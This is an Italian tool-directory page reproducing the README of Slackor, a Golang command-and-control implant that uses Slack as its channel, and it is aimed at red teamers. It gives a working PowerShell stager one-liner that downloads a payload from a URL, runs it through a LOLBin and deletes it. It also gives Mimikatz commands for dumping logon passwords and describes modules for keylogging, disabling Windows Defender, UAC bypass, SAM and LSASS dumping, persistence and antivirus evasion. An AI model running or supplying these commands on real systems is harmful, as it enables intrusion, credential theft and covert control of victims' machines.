Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Slackor — Un implant in Golang che utilizza Slack come server di comando e controllo. | Kitploit
Strumenti/GitHubGitHub/coalfire-research/slackor
Escalation di PrivilegiGenerazione di PayloadMeccanismi di PersistenzaMovimento LateraleShellcodePost-ExploitPenetration TestingCommand and ControlRed Teaming
GitHubcoalfire-research/slackor

Slackor

Un implant in Golang che utilizza Slack come server di comando e controllo.

4601086 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web

Slackor #

Mantenuto su https://github.com/n00py/Slackor

Un implant in Golang che utilizza Slack come canale di comando e controllo.

Questo progetto è stato ispirato da Gcat e Twittor.

Screenshot di Slackor Screenshot di Wireshark Questo strumento è rilasciato come proof of concept. Assicurati di leggere e comprendere la Slack App Developer Policy prima di creare app Slack.

Configurazione

Nota: Il server è scritto in Python 3

Per farlo funzionare hai bisogno di:

  • Un Workspace Slack

  • Registra un'app con i seguenti permessi:

    • channels:read
    • channels:history
    • channels:write
    • files:write:user
    • files:read
  • Crea un bot

Questo repository contiene cinque file:

  • install.sh Installa le dipendenze
  • setup.py Lo script per creare i canali Slack, il database e l'implant
  • agent.py Script per generare nuovi implant
  • server.py Il server Slackor, progettato per essere eseguito su Linux
  • agent.go L'implant in Golang
  • requirements.txt Dipendenze Python (installate automaticamente)

Per iniziare:

  • go get github.com/Coalfire-Research/Slackor
  • cd $GOPATH/src/github.com/Coalfire-Research/Slackor
  • Esegui install.sh
  • Esegui setup.py
    • Fornisci il OAuth Access Token e il Bot User OAuth Access Token dalla tua app

Dopo aver eseguito con successo lo script, verranno creati diversi file nella directory dist/:

  • agent.windows.exe: binario Windows 64-bit
  • agent.upx.exe: binario Windows 64-bit, UPX packed
  • agent.darwin: binario macOS 64-bit
  • agent.32.linux: binario Linux 32-bit
  • agent.64.linux: binario Linux 64-bit

Dopo aver avviato server.py su un host Linux, esegui l'agente appropriato tra quelli sopra per il tuo host target.

Esegui il modulo "stager" per generare un one-liner e altri dropper.

root@kitploit:~
powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

Questo eseguirà InvokeWebRequest (PS v.3+) per scaricare il payload, lo eseguirà utilizzando un LOLBin, e poi si cancellerà dopo essere stato terminato. Questo è un esempio funzionante, ma il comando può essere modificato per utilizzare un altro metodo di download o esecuzione.

Utilizzo

Digita "help" o premi [TAB] per vedere la lista dei comandi disponibili. Digita "help [COMANDO]" per vedere la descrizione di quel comando.

(Slackor)

  • help - Mostra il menu di aiuto
  • interact - Interagisci con un agente
  • list - Elenca tutti gli agenti registrati
  • remove - Uccidi e rimuovi un agente
  • revive - Invia un segnale a tutti gli agenti per ri-registrarsi con il server
  • stager - Genera un one-liner per scaricare ed eseguire l'implant
  • quit - Esci dal programma
  • wipefiles - Cancella tutti i file caricati da Slack

Una volta che un agente si connette, puoi interagire con esso. Usa "interact [AGENTE]" per entrare in un prompt dell'agente. Digita "help" o premi [TAB] per vedere la lista dei comandi disponibili.

(Slackor:AGENTE)

  • Comandi Comuni
    • back - Torna al menu principale
    • beacon - Modifica l'intervallo di tempo tra i check-in di un agente (valore predefinito: 5 secondi)
    • download - Scarica un file dall'agente al server Slackor
    • help - Mostra il menu di aiuto
    • kill - Uccidi l'agente
    • sleep - Fa dormire l'agente una volta (inserisci il tempo in secondi)
    • sysinfo - Mostra l'utente corrente, la versione del sistema operativo, l'architettura e il numero di core CPU
    • upload - Carica un file all'agente dal server Slackor
    • wget - Scarica file arbitrari tramite HTTP/HTTPS
  • Comandi Windows
    • bypassuac - Tenta di generare un agente con integrità elevata
    • cleanup - Rimuove artefatti di persistenza
    • clipboard - Recupera il contenuto degli appunti
    • defanger - Tenta di disabilitare Windows Defender
    • duplicate - Fa sì che l'agente generi un'altra istanza di sé stesso
    • getsystem - Genera un agente come NTAUTHORITY/SYSTEM
    • keyscan - Avvia un keylogger sull'agente
    • minidump - Effettua il dump della memoria di lsass.exe e lo scarica
    • persist - Crea persistenza impiantando un binary in un ADS
    • samdump - Tenta di estrarre il file SAM per l'estrazione offline degli hash
    • screenshot - Cattura uno screenshot del desktop e lo recupera
    • shellcode - Esegue shellcode raw x64
  • Comandi Mac
  • Comandi Linux
    • screenshot - Cattura uno screenshot del desktop e lo recupera

Considerazioni OPSEC

L'output dei comandi e i file scaricati sono crittografati con AES, in aggiunta alla crittografia di trasporto TLS di Slack.

I moduli ti avvertiranno prima di eseguire operazioni che scrivono su disco.
Quando esegui comandi shell, tieni presente che verranno eseguiti cmd.exe/bash. Questo potrebbe essere monitorato sull'host. Ecco alcuni comandi OPSEC sicuri che NON eseguiranno cmd.exe/bash:

  • cat - stampa il contenuto del file
  • cd - cambia directory
  • find - cerca nomi di file nelle directory
  • getip - Ottieni l'indirizzo IP esterno (effettua una richiesta DNS)
  • hostname - Mostra il nome dell'host
  • ifconfig - Mostra le informazioni delle interfacce
  • ls - elenca il contenuto della directory
  • mkdir - Crea una directory
  • pwd - stampa la directory di lavoro corrente
  • rm - rimuove un file
  • rmdir - rimuove una directory
  • whoami / getuid - stampa l'utente corrente

Crediti

  • https://github.com/EgeBalci - Funzioni adattate da HERCULES e EGESPLOIT
  • https://github.com/SaturnsVoid - Keylogger adattato da GoBot2
  • https://github.com/vyrus001 - esecuzione shellcode x64 shellGo
  • Funzioni crittografiche adottate da https://www.golang123.com/topic/1686
  • Idea di persistenza da Enigma0x3
  • Minidump adottato da Merlin, crediti a C-Sto
  • Codice screenshot da kbinani
  • Codice clipboard da atotto
  • Generatore di stager da hlldz
  • Bypass UAC di winscripting.blog
  • Ricerca Lulzbin di @vector_sec
  • Innumerevoli thread su StackOverflow
  • Grazie a impacket per l'estrazione degli hash dai registry SAM/SYS/SECURITY.
  • Estrazione delle credenziali dal dump LSASS resa possibile utilizzando pypykatz di skelsec
  • Bob Aman (Sporkmonger) per vari contributi

Obiettivi futuri

  • DOSfuscation
  • Caricare riflessivamente DLL/PE - https://github.com/vyrus001/go-mimikatz
  • Eseguire assembly C# in memoria - https://github.com/lesnuages/go-execute-assembly
  • Offuscamento del codice sorgente https://github.com/unixpickle/gobfuscate

FAQ:

È sicuro da usare per red team/pentesting?

Sì, a patto di alcune condizioni. Sebbene i dati siano crittografati in transito, l'agente contiene la chiave per la decrittazione. Chiunque ottenga una copia dell'agente potrebbe fare reverse engineering ed estrarre le chiavi API e la chiave segreta AES. Chiunque comprometta o ottenga accesso al workspace sarebbe in grado di recuperare tutti i dati al suo interno. Per questo motivo, non è consigliabile riutilizzare la stessa infrastruttura contro più organizzazioni.

E Mimikatz?

L'implant non ha funzionalità di dump delle password in memoria. Se hai bisogno di logonPasswords, puoi provare quanto segue:

root@kitploit:~
(Slackor: AGENTE)minidump

Questo estrarrà automaticamente le password con Pypykatz. In alternativa, puoi usare Mimikatz su Windows.

root@kitploit:~
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords

È cross-platform?

Ha un supporto cross-platform limitato. Non è stato completamente testato su tutti i sistemi su cui può essere eseguito. Il server è progettato per funzionare su Kali Linux. L'agente è compilato per Windows, Mac e Linux, ma è stato testato principalmente su Windows 10. Gli agenti potrebbero gestire male i comandi non supportati dalla loro piattaforma (non provare a fare minidump su un Mac).

Quanto è scalabile?

La scalabilità è limitata dall'API di Slack. Se hai più agenti, considera di aumentare l'intervallo di beacon per quelli non in uso.

È vulnerabile all'analisi standard dei beacon?

Attualmente ogni beacon ha un jitter del 20% integrato e i tempi di beacon possono essere personalizzati. I pacchetti di richiesta e risposta del check-in dell'agente avranno all'incirca la stessa dimensione ogni volta, purché non vengano ricevuti nuovi comandi.

Perché hai fatto [x] quando un modo migliore è [y]?

Ho fatto del mio meglio. Le PR sono incoraggiate :)

Viene rilevato dall'AV!

Essendo ora open source, è destinato ad avere problemi. Sistemerò i moduli come posso, ma non c'è garanzia che bypassi sempre tutti gli AV.

Scarica lo strumento